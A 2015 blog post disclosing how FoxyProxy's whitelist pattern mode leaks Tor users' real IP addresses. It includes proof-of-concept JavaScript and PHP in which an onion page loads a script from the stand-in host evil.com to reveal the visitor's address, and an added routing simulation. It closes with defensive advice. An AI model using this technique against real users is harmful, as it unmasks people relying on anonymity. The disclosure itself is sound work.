Breaking Anonymity With FoxyProxy's Whitelist Pattern

Posted on Mon 23 November 2015 in privacy

FoxyProxy is a popular proxy management tool with 311,549 users on Firefox and 181,624 users on Google Chrome. It’s being recommended around the web for easily managing your proxy configuration but it can cause you problems unless you’re careful.

You can use FoxyProxy in the following ways:

  • Use proxies based on their pre-defined patterns and priorities
  • Use a specific Proxy for all requests

These patterns can consist of

  • Regex or wildcards
  • Whitelist or Blacklist

We’re going to take a look at how it’s possible to deanonymize anyone using the pre-defined whitelist pattern.

Setup

Let’s add a new Tor SOCKS5 proxy using localhost:9050 and the pattern *onion/*

You have probably already figured out where I’m going with this. The issue here is that anything that does not match this pattern will use the default proxy.

Proof of Concept

Our PoC will consist of

  • evil.com/fun.js
  • evil.com/ip.php
  • illegaldrugsq2wm.onion/poc.php (this is a fake hidden service)

fun.js

function httpGet()
{
   var xmlHttp = new XMLHttpRequest();
   xmlHttp.open( "GET", "http://evil.com/ip.php", false );
   xmlHttp.send( null );
   return xmlHttp.responseText;
}

document.write("Real IP: " + httpGet());

ip.php

<?php
header('Access-Control-Allow-Origin: *'); // CORS
echo $_SERVER['REMOTE_ADDR'];
?>

Here’s our hidden service page:

illegaldrugsq2wm.onion/poc.php

<!DOCTYPE html>
<html>
  <head>
    <title>FoxyProxy pattern whitelist PoC</title>
  </head>
  <body>
    <?php echo "IP: " . $_SERVER['REMOTE_ADDR'] . "<br>"; ?> <!-- this should be 127.0.0.1 -->
    <script src="http://evil.com/fun.js"></script> <!-- loads our fun.js -->
  </body>
</html>

  1. FoxyProxy loads illegaldrugsq2wm.onion/poc.php through the Tor proxy because the URL matches the pattern *onion/*
  2. illegaldrugsq2wm.onion/poc.php loads evil.com/fun.js through the default proxy
  3. evil.com/fun.js requests evil.com/ip.php
  4. evil.com/fun.js sends the result from ip.php back to illegaldrugsq2wm.onion/poc.php
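
The routing decision behind steps 1 to 3 can be checked with a small model. This is an added example, not FoxyProxy's code or part of the original post; it assumes that a wildcard pattern is matched against the full URL with * matching any run of characters, that URLs use the http:// scheme, and the names routeFor and findLeaks are hypothetical.

```javascript
// Simplified model of pattern-based proxy selection (illustration only).
// Assumption: "*" in a pattern matches any run of characters in the full URL.
function wildcardToRegExp(pattern) {
  const escaped = pattern.replace(/[.+?^${}()|[\]\\]/g, "\\$&");
  return new RegExp("^" + escaped.replace(/\*/g, ".*") + "$", "i");
}

// mode "patterns": first matching whitelist rule wins, otherwise the default route.
// mode "all": every request goes through one proxy, regardless of URL.
function routeFor(url, config) {
  if (config.mode === "all") return config.proxyForAll;
  for (const rule of config.whitelist) {
    if (wildcardToRegExp(rule.pattern).test(url)) return rule.proxy;
  }
  return config.defaultRoute;
}

// A leak is a request triggered by a page that was loaded through the
// anonymizing proxy, but which is itself routed somewhere else.
function findLeaks(load, config, anonymizingProxy) {
  if (routeFor(load.page, config) !== anonymizingProxy) return [];
  return load.subrequests.filter(
    (url) => routeFor(url, config) !== anonymizingProxy
  );
}

// The setup from this post: Tor only for URLs matching *onion/*.
const CONFIG_WHITELIST = {
  mode: "patterns",
  whitelist: [{ pattern: "*onion/*", proxy: "tor" }],
  defaultRoute: "default",
};
// The alternative from the conclusion: one proxy for all requests.
const CONFIG_ALL = { mode: "all", proxyForAll: "tor" };

// Requests made when the PoC page is opened (URLs taken from the post).
const POC_LOAD = {
  page: "http://illegaldrugsq2wm.onion/poc.php",
  subrequests: ["http://evil.com/fun.js", "http://evil.com/ip.php"],
};

console.log("whitelist leaks:", findLeaks(POC_LOAD, CONFIG_WHITELIST, "tor"));
console.log("proxy-for-all leaks:", findLeaks(POC_LOAD, CONFIG_ALL, "tor"));
```

With the whitelist configuration both evil.com requests leave through the default route; with a single proxy for all requests the list of leaks is empty.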

I know what you’re thinking. This is stupid and trivial. Nobody would do this, right? Here are a few guides that recommend predefined whitelist patterns for browsing Hidden Services:

Conclusion

Use the Tor Browser Bundle! Seriously. If you insist on using FoxyProxy make sure you’re either using a blacklist pattern or switching to using your proxy for all the requests.

Naturally, this is not limited to FoxyProxy. Any proxy handler that supports whitelist patterns and doesn’t load all the requests made by the matching URL through the proxy will be affected.